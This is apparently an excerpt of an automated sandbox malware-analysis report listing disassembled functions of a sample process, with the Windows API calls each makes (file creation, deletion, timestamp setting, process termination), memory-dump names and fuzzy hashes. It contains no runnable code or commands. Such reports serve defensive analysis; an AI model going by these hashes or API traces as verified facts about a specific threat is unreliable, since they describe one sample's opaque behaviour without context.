Part of subcall function 00007FF7BB231FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB231FFB

Part of subcall function 00007FF7BB23129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB231396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2601BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2601C1
SendDlgItemMessageW.USER32 ref: 00007FF7BB2601F2

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
String ID:
API String ID: 3106221260-0
Opcode ID: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
Instruction ID: 2e5bd5cb2217b56a35222601de8e6045fada50304f52adad6f28cb1ef133a7fd
Opcode Fuzzy Hash: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
Instruction Fuzzy Hash: 2951A262F056414AFB00ABADD4552FDA362BBAAB84F800135DF4E57BEEDE2CD504C360

Function 00007FF7BB242134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF7BB2421CF
CreateFileW.KERNEL32 ref: 00007FF7BB24223C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2422D8

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: CreateFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2272807158-0
Opcode ID: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
Instruction ID: 2328edfbe221f274979467f023f580ff18125e12ad2ba5b7b5466f74d87974d2
Opcode Fuzzy Hash: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
Instruction Fuzzy Hash: 8841C872A18B8182EB109B1EE4442A9B361FB967B4F505334DFAD07EE9CF3CD4908714

Function 00007FF7BB2323F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF7BB23243E
GetWindowTextW.USER32 ref: 00007FF7BB232476
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB232505

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2176759853-0
Opcode ID: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
Instruction ID: 5bc3202e25cd5eebc9e4f42ebaad67d4309c9eaa6e36f5ddd9ccbb148a82aa3f
Opcode Fuzzy Hash: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
Instruction Fuzzy Hash: 35219372A19B8181EA10AB6DA4401BEA364FB9EBD0F545235EFDD03BA9DF3CD190C700

Function 00007FF7BB251F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BB25205B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BB252077
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BB252093

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: 7fdfb8b08260a68de66ecd622df27e98485fdb680c183650925e5cdb3d7d3185
Instruction ID: c13727b025a748e2ac3b0b1bc539e9cf32afa203f5f9a53090dd2e494e3e1584
Opcode Fuzzy Hash: 7fdfb8b08260a68de66ecd622df27e98485fdb680c183650925e5cdb3d7d3185
Instruction Fuzzy Hash: 4B317012A09A4651FB24AB1CE4883F9A3A0FB76784F944431DB8C065FDDF7CE946C321

Function 00007FF7BB2431BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00007FF7BB250822), ref: 00007FF7BB2431E7
DeleteFileW.KERNEL32 ref: 00007FF7BB243237
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2432A1

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3118131910-0
Opcode ID: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
Instruction ID: ea5ef500a96afdda3ed749111f104c59ab6107285b81da4c5bde7c6cfd806972
Opcode Fuzzy Hash: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
Instruction Fuzzy Hash: F1218E22A1878181EA10DB2DF4451AEB360FB9AB94F901234EF9D46ABDDF3CD541C614

Function 00007FF7BB2432BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF7BB24E5B1,?,?,?,00000000,?), ref: 00007FF7BB2432E7
GetFileAttributesW.KERNELBASE ref: 00007FF7BB243334
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB243399

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
Instruction ID: 19752029ca115a574a8d4e080f51b934d80ae4b377ee5d7031105cc3a370b908
Opcode Fuzzy Hash: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
Instruction Fuzzy Hash: 6021A722A18A8181EA10AB2DF4441A9A361FBDABA4F900231EF9D47BFDDF3CD440C654

Function 00007FF7BB26BF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7BB26BF48), ref: 00007FF7BB26BF8C
TerminateProcess.KERNEL32(?,?,?,00007FF7BB26BF48), ref: 00007FF7BB26BF97
ExitProcess.KERNEL32 ref: 00007FF7BB26BFA6

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction ID: 05c5df3a1b1d5ff9259aed8fe8262e2920fe33e090c79aba8bdc52c7bca80a51
Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction Fuzzy Hash: 59E01218A0430546EA547B6E58553F953527F6E741F504438DE0F473BACD3DA8094721

Function 00007FF7BB233904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB233AB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB233AB9

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
Instruction ID: bb52c3863965e60fbeca68176add93a36e2d9633a54f4c6de0e1ad944d82ccb8
Opcode Fuzzy Hash: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
Instruction Fuzzy Hash: 4641C322F1865188FB00EBBDD4502EDA360BF66B94F941135DF5D27AEECE38D5868310

Function 00007FF7BB242778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF7BB24274D), ref: 00007FF7BB2428A9
GetLastError.KERNEL32(?,00007FF7BB24274D), ref: 00007FF7BB2428B8

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction ID: 60433ccabc176123ad07ddc4619e9aa4061b9e010e0524656f07e3669a56ac0c
Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction Fuzzy Hash: CE31C422B29D4282EA606A2FD9407F8A350BF66BD4F840531DF1D57BB8DE3CD8428670

Function 00007FF7BB2322BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF7BB2322F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2323F0

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: Item_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1746051919-0
Opcode ID: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
Instruction ID: 4b9a016ca110f38cbbab1b0ea506052a22154e4db660bbd60c31f3468a1c16d0
Opcode Fuzzy Hash: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
Instruction Fuzzy Hash: A031B221A18B8186EA10AB1DF4443AAF360FBA6790F805235EF9D07BBDDF3CE4448714

Function 00007FF7BB242AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF7BB242AFE
SetFileTime.KERNELBASE ref: 00007FF7BB242B9B

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction ID: d29582644351eb505ff6905714114f29f40f63e714cbc790b2e8ff150fd82623
Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction Fuzzy Hash: 5F210522E1DF4250EA62AE1ED4043FA9790BF23794F954034DF4C06ABDEE7CD586C620

Function 00007FF7BB24AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF7BB24AB67
LoadStringW.USER32 ref: 00007FF7BB24AB80

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction ID: 3c5e7e6559553b073c5c963fc60a49fc9523839b864a4824b54e4d693d6c856b
Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction Fuzzy Hash: 06115171B0864589FA14AF2EA8401A9F7A1BBAAFC0B944435CF5D93B38DE7CE5418354

Function 00007FF7BB242BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF7BB242C11
GetLastError.KERNEL32 ref: 00007FF7BB242C1E

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction ID: a3bb1093b4725e708b16ca013a76445ba95be987df75e2eab05d1597483d5185
Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction Fuzzy Hash: E311A821A18A4181FB50AB2EE8402BAA250FB66B74F940331DF7D066FCCF3CD596C710

Function 00007FF7BB24EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7BB24EBAD,?,?,?,?,00007FF7BB245752,?,?,?,00007FF7BB2456DE), ref: 00007FF7BB24EB5C
GetProcessAffinityMask.KERNEL32 ref: 00007FF7BB24EB6F

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction ID: b52300c77c4443b51eb9554180bc3789f178e4d14aaf2048b3cd41d602a8cc15
Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction Fuzzy Hash: B1E02B61F2458642DF0DAF5FC4404E9B392BFD9B40BC48035DB0B83A2CDE2CE6458B00

Function 00007FF7BB2621D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB262200

Part of subcall function 00007FF7BB262F7C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BB262F85

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB262206

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
Instruction ID: e516d2983402fb174d6b124c4a75fde9c5928536a9cd50b2a09f761e12cb1f95
Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
Instruction Fuzzy Hash: 53E0B640E0D60746F918726D18261F481506F3F371EA81B70DF7F842EFAE2CA4968170

Function 00007FF7BB26D90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL ref: 00007FF7BB26D922
GetLastError.KERNEL32 ref: 00007FF7BB26D934

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction ID: c8e4da377f44ca5877804e93a064b8cf2706d9809f9970b504fd8170eb577c16
Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction Fuzzy Hash: 7CE04F50E0A10742FF097BBF58451F492907FBE790B840030CF0ECA27ADE2CA4819220

Function 00007FF7BB2333E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB23388C

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: d9984bf57418443c007321115317a4667c9375466ee7e8bcba90f6b0858b89e4
Instruction ID: 0b550a1d333aa4e5b16cab73d993f2cf1c502e6b4f381d00d41cf0bbb709c594
Opcode Fuzzy Hash: d9984bf57418443c007321115317a4667c9375466ee7e8bcba90f6b0858b89e4
Instruction Fuzzy Hash: D2D1DC72B1868159EB28AB2D95402F8F7A1FB26B84F840435CF1D477B9CF3CE5658720

Function 00007FF7BB245294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24551B

